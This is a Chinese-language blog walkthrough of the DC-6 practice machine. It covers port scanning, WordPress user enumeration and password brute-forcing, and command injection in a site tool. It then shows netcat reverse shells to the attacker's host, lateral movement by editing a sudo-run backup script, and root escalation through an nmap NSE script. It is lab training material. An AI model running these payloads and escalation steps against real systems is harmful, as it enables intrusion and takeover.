DC6靶机训练

kali:192.168.78.131
DC-6:192.168.78.140

ifconfig
nmap -sP 192.168.78.0/24 
nmap -p 1-65535 -A -sV 192.168.78.140

在这里插入图片描述

访问80端口,查看框架

在这里插入图片描述

眼熟的WordPress,扫描域名,寻找我们需要的登录框

find / -name "dirseach*" 2> /dev/null (查询dirseach模块在哪里
python3 dirsearch.py -u url -e php

找到我们需要的模块: login.php

在这里插入图片描述
访问然后查看

在这里插入图片描述

既然前面说了框架版本是wordrpress,那就使用WPScan登录爆破

wpscan --url http://wordy -eu 

扫描出账户,保存在name.txt中
在这里插入图片描述
进行密码爆破

cat /usr/share/wordlists/rockyou.txt | grep k01 > pass.txt 
wpscan --url wordy -U USER.TXT -P passwords.txt  

在这里插入图片描述

登录页面,发现tool这个地方存在RCE(打过CTF的看一眼就知道)

在这里插入图片描述
尝试一下看看是否存在RCE

127.0.0.1 | ls 

在这里插入图片描述存在RCE,经过测试这里有长度限制,修改一下即可

在这里插入图片描述
反弹一下shell

nc 192.168.78.131 2333 -c /bin/bash

在这里插入图片描述

拿到shell,切换成交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

查询开启的SUID

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null  ## 两个命令都可以

在这里插入图片描述
没有什么可用的,查看一下用户文件,发现提示文件发现了graham的账户和密码,SSH登录

在这里插入图片描述

看一下SUID:

在这里插入图片描述
依然没有可以使用的

sudo -l
显示出自己(执行 sudo 的使用者)的权限

在这里插入图片描述

可疑的脚本

在这里插入图片描述
很显然jens作为用着具有更改修改脚本的能力

在这里插入图片描述

修改脚本反弹shell:

vi xxx/xxx
nc -e /bin/bash 192.168.78.131 2333
sudo -u jens /home/jens/backups.sh

监听反弹shell

在这里插入图片描述
紧接着查看一下SUID SUDO

在这里插入图片描述

发现nmap可以执行,因此接下来就是nmap提权
nmap 不清楚

cat os.execute("/bin/sh") > nse_root.nse
nmap --script=/home/jens/nse_root.nse

提权成功

在这里插入图片描述

拿到FLAG

在这里插入图片描述

总结一下这个靶机:
这个靶机比前面的靶机更有意思一点,也是因为自己没有什么耐心,所以老是会去看WP,这次靶场一共有3个用户,我们进行了横向移动,最终完成提权:
我们首先在A账户里面发发现了B账户的账号和密码,然后通过B账号的账号和密码查询SUID发现了拥有者为C账户的可编辑执行脚本,于是反弹shell拿到C账户的shell,然后通过C账户使用nmap进行提权,最后拿下FLAG,做完之后发现做题需要的更多的是耐心,只有一步步探索才能真正享受乐趣

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值